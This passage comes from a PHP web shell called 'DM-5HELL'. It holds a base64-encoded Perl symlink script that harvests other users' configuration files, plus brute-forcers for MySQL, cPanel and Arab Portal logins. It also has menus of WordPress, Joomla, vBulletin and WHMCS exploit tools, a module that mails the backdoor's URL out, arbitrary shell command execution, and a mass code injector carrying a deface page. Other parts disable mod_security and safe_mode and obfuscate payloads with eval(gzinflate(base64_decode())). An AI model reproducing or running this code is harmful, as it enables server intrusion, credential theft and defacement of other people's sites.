2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3JkZXIvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJzIxLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRrb2xhLicyMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRrb2xhLicyMy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJzI0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Nvbm5lY3QucGhwJywka29sYS4nMjUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWtfY29uZi5waHAnLCRrb2xhLicyNi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2NvbmZpZy5waHAnLCRrb2xhLicyNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLicyOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nMjkudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLiczMC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wb3J0YWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50YXJlYS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NlY3VyZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Byb2R1Y3QvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWVtYmVyL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudGUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbGllbnRlcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3RyaWFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21hbmFnZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21hbmFnZXIvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9teWFjY291bnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hY2NvdW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQoNCn0NCg0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQo8aDE+PGk+PHU+LS09W1sgRE0gVEU0TSBdXT0tLTwvdT48L2k+PC9oMT4NCjxiciAvPg0KPGZvcm0gbWV0aG9kPSJwb3N0Ij4NCjx0ZXh0YXJlYSBuYW1lPSJwYXNzIiBzdHlsZT0iYm9yZGVyOjJweCBkb3R0ZWQgIzAwMzMwMDsgd2lkdGg6IDU0M3B4OyBoZWlnaHQ6IDQyMHB4OyBiYWNrZ3JvdW5kLWNvbG9yOiMwQzBDMEM7IGZvbnQtZmFtaWx5OlRhaG9tYTsgZm9udC1zaXplOjhwdDsgY29sb3I6I0ZGRkZGRiIgID48L3RleHRhcmVhPjxiciAvPg0KJm5ic3A7PHA+DQo8aW5wdXQgbmFtZT0idGFyIiB0eXBlPSJ0ZXh0IiBzdHlsZT0iYm9yZGVyOjFweCBkb3R0ZWQgIzAwMzMwMDsgd2lkdGg6IDIxMnB4OyBiYWNrZ3JvdW5kLWNvbG9yOiMwQzBDMEM7IGZvbnQtZmFtaWx5OlRhaG9tYTsgZm9udC1zaXplOjhwdDsgY29sb3I6I0ZGRkZGRjsgIiAgLz48YnIgLz4NCiZuYnNwOzwvcD4NCjxwPg0KPGlucHV0IG5hbWU9IlN1Ym1pdDEiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IiBIQUpBUiBDT1kgIiBzdHlsZT0iYm9yZGVyOjFweCBkb3R0ZWQgIzAwMzMwMDsgd2lkdGg6IDk5OyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZToxMHB0OyBjb2xvcjojRkZGRkZGOyB0ZXh0LXRyYW5zZm9ybTp1cHBlcmNhc2U7IGhlaWdodDoyMzsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDIiAvPjwvcD4NCjwvZm9ybT48YnIgLz48YnIgLz4nOw0KfWVsc2V7DQpAbGluZXMgPTwkRk9STXtwYXNzfT47DQokeSA9IEBsaW5lczsNCm9wZW4gKE1ZRklMRSwgIj50YXIudG1wIik7DQpwcmludCBNWUZJTEUgInRhciAtY3pmICIuJEZPUk17dGFyfS4iLnRhciAiOw0KZm9yICgka2E9MDska2E8JHk7JGthKyspew0Kd2hpbGUoQGxpbmVzWyRrYV0gID1+IG0vKC4qPyk6eDovZyl7DQombGlsKCQxKTsNCnByaW50IE1ZRklMRSAkMS4iLnR4dCAiOw0KZm9yKCRrZD0xOyRrZDwxODska2QrKyl7DQpwcmludCBNWUZJTEUgJDEuJGtkLiIudHh0ICI7DQp9DQp9DQogfQ0KcHJpbnQnPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQo8cD5TRUxFU0FJIEJPUyB8fCBDRUsgRk9MREVSIElNQUdFUzwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5Eb3dubG9hZCBUYXIgRmlsZTwvc3Bhbj48L2ZvbnQ+PC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7";
- $write = fwrite($f2 ,base64_decode($sml_perl));
- if($write)
- {@chmod('image/anu.pl',0755);}
- echo "<center><iframe src=image/anu.pl width=96% height=126% frameborder=0></iframe></div>";
- }
- }
- ## ***** x=dmwp ***** ##
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwp')) {
- // wordpress bruteforce
- // wordpress index changer
- // wordpress password changer
- echo '<center><br/><br/><img src="http://s.wordpress.org/about/images/logos/wordpress-logo-hoz-rgb.png"><br/><br/> <nobr><b><span class="b7">O=:[ WORDPRESS</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
- <div id="menu" align="center"><table><tr>
- <td align=center><b><a href="?dm='.$pwd.'&x=wp1">WP BRUTEFORCE</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=wp2">WP AUTO DEFACE</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=wp3">WP PASSWORD CHANGER</a></b></td>
- </tr></table></div><br/>';
- }
- ## ***** x=dmvb ***** ##
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmvb')) {
- // vbullettin index changer
- // vbulletin password changer
- echo '<center><br/><br/>
- <img src="http://forum.paradoxplaza.com/forum/images/mobile/vbulletin-logo.png"><br/><br/><nobr><b><span class="b7">O=:[ VBULLETIN</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
- <div id="menu" align="center"><table><tr>
- <td align=center><b><a href="?dm='.$pwd.'&x=vb1">VB INDEX CHANGER</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=vb2">VB PASSWORD CHANGER</a></b></td>
- </tr></table></div><br/>';
- }
- ## ***** x=dmjm ***** ##
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmjm')) {
- // joomla bruteforce
- // exploit joomla jce uploader
- // joomla password changer
- echo '<center><br/><br/><img src="http://www.payingdialer.com/images/joomla-logo.png"><br/><br/> <nobr><b><span class="b7">O=:[ JOOMLA</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
- <div id="menu" align="center"><table><tr>
- <td align=center><b><a href="?dm='.$pwd.'&x=jm1">BRUTEFORCE LOGIN</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=jm2">INDEX DEFACE</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=jm3">JCE UPLOADER</a>
- </b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=jm4">PASSWORD CHANGER</a></b></td>
- </tr></table></div><br/>';
- }
- ## ***** x=whmcs2 ***** ##
- elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs2')) {
- // whmcs inject shell
- // whmcs bypass security token
- // whmcs password changer
- // whmcs auto exploiter
- echo '<center><br/><br/><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"><br/><br/><nobr><b><span class="b7">O=:[ WHMCS</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
- <div id="menu" align="center"><table><tr>
- <td align=center><b><a href="?dm='.$pwd.'&x=dmwhmcs1">GRAB PASSWORD CLIENT</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=dmwhmcs2">INJECT SHELL</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=dmwhmcs3">PASSWORD CHANGER</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=dmwhmcs4">BYPASS AUTH LOGIN</a></b></td>
- </tr></table></div><br/>
- <div id="menu" align="center"><table><tr>
- <td align=center><b><a href="?dm='.$pwd.'&x=dmwhmcs5">WHMCS 5.2.7 [php]</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=dmwhmcs6">WHMCS 5.2.7 [python]</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=dmwhmcs7">WHMCS 5.28 [php]</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=dmwhmcs8">WHMCS 5.2.8 [python]</a></b></td>
- </tr></table></div><br/>
- <div id="menu" align="center"><table><tr>
- <td align=center><b><a href="?dm='.$pwd.'&x=dmwhmcs9">CHECK LICENSE & VERSION</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=dmwhmcs10">v5.2.7 VULN SCANNER</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=dmwhmcs11">SCAN CMS WHMCS</a></b></td>
- </table></div><br/><br/> ';
- }
- ## ***** x=cpanel ***** ##
- elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel')) {
- // cpanel bruteforce
- // cpanel mass deface
- // cpanel bruteforce using config
- echo '<center><br/><br/><img src="http://earthnexus.com/images/cpanel_logo.gif"><br/><br/> <nobr><b><span class="b7">O=:[ CPANEL</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
- <div id="menu" align="center"><table><tr>
- <td align=center><b><a href="?dm='.$pwd.'&x=cp1">BRUTEFORCE CP LOGIN</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=cp2">BRUTEFORCE CP AUTO DEFACE</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=cp3">BRUTEFORCE CONFIG CP </a></b></td>
- </tr></table></div><br/>';
- }
- ## ***** x=iis7 ***** ##
- elseif(isset($_GET['x']) && ($_GET['x'] == 'iis7')) {
- echo '<center><br/><br/><img src="http://www.codeblog.co.uk/wp-content/uploads/2010/06/iis7-300x215.jpg"><br/><br/> <nobr><b><span class="b7">O=:[ WINDOWS IIS7</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
- <div id="menu" align="center"><table><tr>
- <td align=center><b><a href="?dm='.$pwd.'&x=iis7httpd">HTTPD EXPLOIT</a></b></td>
- <td align=center><b><a href="?dm='.$pwd.'&x=iis7port">PORT EXPLOIT</a></b></td>
- </tr></table></div><br/>';
- }
- # x=posisi
- elseif(isset($_GET['x']) && ($_GET['x'] == 'posisi')) {
- function curPageURL() {
- $pageURLe = 'http';
- if($_SERVER["HTTPS"] == "on"){
- $pageURL .= "s";
- }
- $pageURLe .= "://";
- if ($_SERVER["SERVER_PORT"] != "80") {
- $pageURLe .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
- } else {
- $pageURLe .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
- }
- return $pageURLe;
- }
- $votremail=$_SERVER['SERVER_ADMIN'];
- $objet='BACKDOOR SHELL';
- $message=curPageURL();
- $headers='From:'.$votremail."\r\n".'To:'.$destinataire."\r\n".'Subject:'.$objet."\r\n".'Content-type:text/plain;charset=iso-8859-1'."\r\n".'Sent:'.date('l, F d, Y H:i');
- if(mail($destination,$objet,$message,$headers))
- {
- echo "<br><center><b></b><br/><p><b>[+] $destination [+]</b><center>";}
- else
- {
- echo "<br><center><font size=4 color=red>Error Saving Backdoor</font><center>";
- }
- }
- else if(isset($_POST['executecmd']))
- {
- $check = shell_exec($_POST['mycmd']);
- echo "<textarea cols=120 rows=20 class=box>" . $check . "</textarea>";
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'inject')){
- ?>
- <center><table id="margins" >
- <tr>
- <form method='POST'><input type="hidden" name="injector"/>
- <tr><td width="30" class="title">
- DIR : <input class="inputz" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>"/></td></tr>
- <tr><td class="title">
- Mode : <select class="inputz" name="mode" style="width:130px;">
- <option value="Apender">SEMI INJECT</option>
- <option value="Overwriter">FULL Inject</option>
- </select></td></tr>
- <tr><td class="title">
- File Type : <input type="text" class="inputz" name="filetype" value=".php" onBlur="if(this.value=='')this.value='.php';"/></td></tr>
- <tr><td colspan="2">
- <textarea name="injectthis" cols="110" rows="10" class="inputz">
- <?php echo base64_decode("PGh0bWw+DQo8aGVhZD48dGl0bGU+Li9INENLM0QgQlkgRzRudDNuRzNyejwvdGl0bGU+PC9oZWFkPg0KPGJvZHk+DQpURVJJTUEgS0FTSUggR1VFIEdBTlRFTkcgOnYNCjwvYm9keT4NCjwvaHRtbD4="); ?>
- </textarea></td></tr>
- <tr><td rowspan="2">
- <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="inputz" value=" INJECT CODE :P "/></td></tr>
- </form></table></center>
- <?php
- }
- # x=bforce1
- elseif(isset($_GET['x']) && ($_GET['x'] == 'bruteforce'))
- {
- $f =@fopen ('users.txt','w');
- if(!$users=get_users()) {
- echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>";
- }
- else {
- foreach($users as $user) {
- @fwrite($f , $user);
- @fwrite($f , "\n");
- }
- }
- echo '<br><center><font size=3 color=green>[+] BUKA users.txt <a href=dmshell.txt target=blank>_DISINI_</a> COPY & PASTE DI KOLOM USER [+]</font></center><BR>';
- ?>
- <form method="POST" target="_self">
- <input name="page" type="hidden" value="find">
- <table width="33%" cellpadding="3" cellspacing="1" align="center">
- <tr>
- <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
- <strong>User :</strong></td>
- <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea class="inputz" cols="40" rows="10" name="usernames"></textarea></strong></td>
- </tr>
- <tr>
- <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
- <strong>Pass :</strong></td>
- <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea class="inputz" cols="40" rows="10" name="passwords"></textarea></strong></td>
- </tr>
- <tr>
- <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
- <strong>Type :</strong></td>
- <td valign="top" bgcolor="#151515" colspan="5">
- <span class="style2"><strong>Simple : </strong> </span>
- <strong>
- <input class="inputz" type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
- <font class="style2"><strong>/etc/passwd : </strong> </font>
- <strong>
- <input class="inputz" type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
- </strong>
- </span>
- </td></tr>
- <tr>
- <td valign="top" bgcolor="#151515" style="width: 139px"></td>
- <td valign="top" bgcolor="#151515" colspan="5"><strong><input class="inputz" type="submit" value="_START CRACK _"></strong>
- </td><tr></form>
- <?php
- if(isset($_POST['usernames']) && isset($_POST['passwords']))
- {
- if($_POST['type'] == 'passwd'){
- $e = explode("\n",$_POST['usernames']);
- foreach($e as $value){
- $k = explode(":",$value);
- $username .= $k['0']." ";
- }
- }
- elseif($_POST['type'] == 'simple'){
- $username = str_replace("\n",' ',$_POST['usernames']);
- }
- $a1 = explode(" ",$username);
- $a2 = explode("\n",$_POST['passwords']);
- $id2 = count($a2);
- $ok = 0;
- foreach($a1 as $user )
- {
- if($user !== '')
- {
- $user=trim($user);
- for($i=0;$i<=$id2;$i++)
- {
- $pass = trim($a2[$i]);
- if(@mysql_connect('localhost',$user,$pass))
- {
- echo "[+] Username ( <b><font color=green>$user</font></b> ) Password ( <b><font color=green>$pass</font></b> ) [+]<br />";
- $ok++;
- }
- }
- }
- }
- echo "<hr><b>DAPAT <font color=green>$ok</font> Cpanel</b>";
- echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
- exit;
- }
- }
- # x=safemodeoff
- elseif(isset($_GET['x']) && ($_GET['x'] == 'safemodeoff')) {
- $file_pointer = fopen(".htaccess", "w+");
- fwrite($file_pointer, "<IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- </IfModule>");
- $file_pointer = fopen("ini.php", "w+");
- fwrite($file_pointer, "<?
- echo ini_get(\"safe_mode\");
- echo ini_get(\"open_basedir\");
- include(\$_GET[\"file\"]);
- ini_restore(\"safe_mode\");
- ini_restore(\"open_basedir\");
- echo ini_get(\"safe_mode\");
- echo ini_get(\"open_basedir\");
- include(\$_GET[\"ss\"]);
- ?>");
- $file_pointer = fopen("php.ini", "w+");
- fwrite($file_pointer, "safe_mode = Off");
- fwrite($file_pointer, "\n disable_functions = NONE");
- fclose($file_pointer);
- echo "<center>[+] Safe Mode Off Succesfully [+]</center>";
- ?>
- <?php }
- // x=arabportal
- elseif(isset($_GET['x']) && ($_GET['x'] == 'arabportal')){
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=arabportal" method="post">
- <?php
- echo "<br/><br/><nobr><b><span class='b7'>O=:[ BRUTEFORCE</span> <span class='b8'>ARAB PORTAL ]:=O</span></b></nobr><br/><br/> <form method='POST'>
- <p align='center' dir='ltr'> <input type='text' value='http://target.com/arabportal/' name='target' size='45'>
- <input type='text' value='admin' name='username'>
- <br><input type='submit' value='Start Brute'>
- </p>";
- $site = $_POST['target']."/admin/";
- $username = $_POST['username'];
- # Passwords
- $passwords = array('123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012');
- function brute($site,$username,$password)
- {
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_URL, $site);
- curl_setopt($curl,CURLOPT_POSTFIELDS,"user_name={$username}&user_pass={$password}");
- @curl_setopt($curl,CURLOPT_COOKIEJAR,"cookie.txt");
- @curl_setopt($curl,CURLOPT_COOKIEFILE,"cookie.txt");
- $brute = curl_exec($curl);
- if(eregi('<p align="center"><b><font size="4" color="#FFFFFF">', $brute))
- {
- echo "<center><b><font face='Tahoma' size='2'>[+] Cracked Username
- : <font color='#FF0000'>{$username}</font> & Password : <font color='#FF0000'>{$password}</font></font></b>";
- }
- return $brute;
- }
- foreach($passwords as $password)
- {
- brute($site,$username,$password);
- }
- echo "</form>";
- ?>
- <?php }
- // x=about
- elseif(isset($_GET['x']) && ($_GET['x'] == 'about')){
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=about" method="post">
- <?php
- echo "<div align='center'><br><br>
- <table class='tabnet' style='padding:0 1px;'>
- <tr><th align='center'><b>DISCLAIMER</b></th></tr>
- <tr><td align='left'><nobr>
- <span class='b12'>THIS TOOL WAS WRITTEN FOR
- EDUCATIONAL PURPOSES.</span></nobr></td></tr>
- <tr><td align='left'><nobr>
- <span class='b12'>ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST.</span></nobr></td></tr>
- <tr><td align='left'><nobr>
- <span class='b12'> IF YOU DON'T AGREE WITH WHAT I
- SAID, PLEASE DON'T USE THIS TOOL.</span></td></tr>
- <tr><td align='left'><nobr>
- <span class='b12'> THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR
- DAMAGE ARISING WITH THE USE OF THIS TOOL. </span></nobr></td></tr>
- <tr><td align='left'><nobr>
- <span class='b12'>USE IT UNDER YOUR OWN RISK !!!!!!</span>
- </nobr></td></tr>
- <tr><td align='left'><nobr>
- <span class='b12'>THANKS...</span>
- </nobr></td></tr>
- </table><br><br>
- </html>";
- echo "<div align='center'><br><br>
- <table class='tabnet' style='padding:0 1px;'>
- <tr><th align='center'><b>ABOUT DM-5HELL</b></th></tr>
- <tr>
- <td>
- <table border=1>
- <tr>
- <td>Author</td>
- <td>Andripzf</td>
- </tr>
- <tr>
- <td>Design</td>
- <td>Andripzf</td>
- </tr>
- <tr>
- <td>Adding Exploit</td>
- <td>Andripzf</td>
- </tr>
- <tr>
- <td>Basic Shell</td>
- <td>b374k m1n1 PHP Shell</td>
- </tr>
- <tr>
- <td>Bypass Symlink</td>
- <td><nobr>Thanks to Mauritania, Mr.Alasaek,Lagripe-Dz, PakCyber, BD Cyber Army</nobr></td>
- </tr>
- <tr>
- <td>Whmcs Exploit</td>
- <td><nobr>Thanks to Rab3oun, g00n, theMaster,Lagripe-Dz, X3group</nobr></td>
- </tr>
- <tr>
- <td>WP Exploit</td>
- <td>Thanks to XTTG, Lagripe-Dz</td>
- </tr>
- <tr>
- <td>Joomla Exploit</td>
- <td>Thanks to XTTG, Lagripe-Dz</td>
- </tr>
- <tr>
- <td>VB Exploit</td>
- <td>Thanks to Tryag</td>
- </tr>
- <tr>
- <td>Config Killer Exploit</td>
- <td><nobr>Thanks to Indishell, Anonghost, Lagripe-Dz, Indrajith</nobr></td>
- </tr>
- <tr>
- <td>Security Bypass Exploit</td>
- <td>Thanks to Mauritania, Lagripe-Dz </td>
- </tr>
- <tr>
- <td>Greetz To</td>
- <td><nobr>Exploit-DB, 1337 0day, All Moeslim Hackers And Coders In The World</nobr></td>
- </tr>
- </table>
- </td></tr>
- </table><br><br>
- </html>";
- ?>
- <?php }
- // x=coding
- elseif(isset($_GET['x']) && ($_GET['x'] == 'coding')){
- // encode & decode
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=coding" method="post">
- <?php {
- echo "<br><br><center><div id=result> <nobr><b><span class='b7'>O=:[ ENCODE</span> <span class='b8'>DECODE ]:=O</span></b></nobr><br/><br/>
- <form method='post'><table class=tbl>
- <tr><td>Method : <select name='typed' style='color:red; background-color:black; border:1px solid #666;'>
- <option>Encode</option><option>Decode</decode></select> </td></tr>
- <tr><td>TYPE : <select name='typenc' style='color:red; background-color:black; border:1px solid #666;'>
- <option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>
- </td>
- <tr><td>
- <textarea spellcheck='false' style='color:#FF0000;background-color:#000000' cols='80' rows='25' name='php_content'></textarea></tr>
- </td></table><hr/><input style='color:#FF0000;background-color:#000000' type='submit' value=' >> ' /><br /><hr /><br /></form></div>";
- $meth_d=$_POST['typed'];
- $typ_d=$_POST['typenc'];
- $c_ntent=$_POST['php_content'];
- $c_ntent=$c_ntent;
- switch($meth_d)
- {
- case "Encode":
- switch($typ_d)
- {
- case "GZINFLATE":
- $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
- $res_t="<?php eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
- break;
- case "GZUNCOMPRESS":
- $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
- $res_t="<?php eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
- break;
- case "STR_ROT13":
- $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>');
- $res_t=base64_encode(str_rot13($res_t));
- $res_t="<?php eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
- break;
- }
- break;
- case "Decode":
- switch($typ_d)
- {
- case "GZINFLATE":
- $res_t=gzinflate(base64_decode($c_ntent));
- break;
- case "GZUNCOMPRESS":
- $res_t=gzuncompress(base64_decode($c_ntent));
- break;
- case "STR_ROT13":
- $res_t=str_rot13(base64_decode($c_ntent));
- break;
- }
- break;
- }
- echo "<center><div id=result><textarea spellcheck='false' style='color:#FF0000;background-color:#000000' cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";
- }
- ?>
- <?php }
- # x=sscan
- elseif(isset($_GET['x']) && ($_GET['x'] == 'cp2')){
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=cp2" method="post">
- <br/><br/><center><nobr><b><span class='b7'>O=:[ FTP MASS</span> <span class='b8'>DEFACE ]:=O</span></b></nobr><br/><br/>
- <form method="post">
- <center>
- IP Server:<input type="text" name="ip" value="127.0.0.1" />
- <p> </p>
- User's List:<br>
- <textarea rows="10" style="width:35%;" name="users" value="The Users List"></textarea>
- <p> </p>
- Password's List:<br>
- <textarea rows="10" style="width:35%;" name="passwords" value="The Password List"></textarea>
- <p> </p>
